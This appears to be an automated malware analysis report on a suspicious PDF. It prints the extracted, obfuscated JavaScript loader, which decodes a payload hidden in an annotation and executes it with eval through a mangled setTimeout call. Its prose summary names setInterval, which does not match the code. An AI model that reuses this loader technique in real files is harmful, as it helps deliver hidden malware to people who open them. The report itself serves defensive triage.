Verdict: SUSPICIOUS
Risk Score: 56

Malware Insights

MITRE ATT&CK:
- T1059.007 JavaScript
- T1566.001 Spearphishing Attachment
The PDF contains embedded JavaScript that is heavily obfuscated using character code manipulation and string concatenation. The script decodes a string using a base value of 237 and then executes it using `app.setInterval`. This pattern is commonly used to download and execute a second-stage payload. The ML classifier also flagged this PDF as malicious with high confidence.
Machine Learning
- Nyx PDF Classifier: malicious score 0.9999

Heuristics (4)
- JavaScript action (low, 1 related finding) PDF_JAVASCRIPT: PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- Embedded JS stream (low) PDF_JS: PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- Optional Content Group with action trigger (low) PDF_OPTIONAL_CONTENT: an Optional Content Group (layer) co-occurs with an action trigger; content can be selectively hidden from viewers or scanners while the action still fires on open.
- Suspicious extracted artifact (info) EXTRACTED_FILE_STATIC_TRIAGE: one or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts (2)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| javascript_obj0010_000.js | pdf-javascript-stream | PDF /JS object 10 at offset 0x8CDA | 1346 bytes |
| stream_001_off00008cda.bin | decompressed-pdf-stream | PDF FlateDecoded stream at offset 0x8CDA | 672 bytes |

javascript_obj0010_000.js SHA-256: 4f4032a2182b874f3b1232f2f4b72c085ae0e07605dea9074b0b6fe9b9735275
stream_001_off00008cda.bin SHA-256: 8f98b621fb93e8c8b0eac8b0b27f9668536e5f68be52b3e5738ae14120777987

Preview of javascript_obj0010_000.js (first 1,000 lines of the extracted script):

```javascript
var BkGbxZlFz = 237;                                  // decode offset ("base value" 237)
var B3FhhEBz = this.getAnnot(0, "0001-0004");         // encoded payload lives in an annotation's subject field
if (B3FhhEBz != null) {
    A9jyJe8 = B3FhhEBz.subject;
}
A9jyJe8 = A9jyJe8.replace(/[^0-9]/g, ';');            // keep digits only, turn everything else into separators
A9jyJe8 = A9jyJe8.replace(/;;/g, '');
function R0LWMZ2jbI2g(W2gnJiUezsgV, gi4bTBD7aBQr) {   // decoder: each number minus the offset is one char code
    var hXs4s = new String(); var rnwRkPMB5i = new String();
    FDRoX = W2gnJiUezsgV.split(';');
    for (vvXqC0ol = 0; vvXqC0ol < FDRoX.length - 1; vvXqC0ol++) {
        P4lwbezT = String['from' + 'Char' + 'Code'](FDRoX[vvXqC0ol] - gi4bTBD7aBQr);
        rnwRkPMB5i = rnwRkPMB5i + P4lwbezT; } return rnwRkPMB5i; };
vnQkXp8i = R0LWMZ2jbI2g(A9jyJe8, BkGbxZlFz);
var t = 'a';
var d = 'u';
libbb = app['set' + 'TimeO' + d + 't']("ev" + t + "l(vnQkXp8i)", 100);   // string-concatenated API name and eval of the decoded string
```
Detection
ClamAV: No threats found
Obfuscation or payload: likely
9 of 17 identifiers look randomly generated (e.g. 'gi4bTBD7aBQr'); 2 string-concatenation chain(s), consistent with name-mangling obfuscation.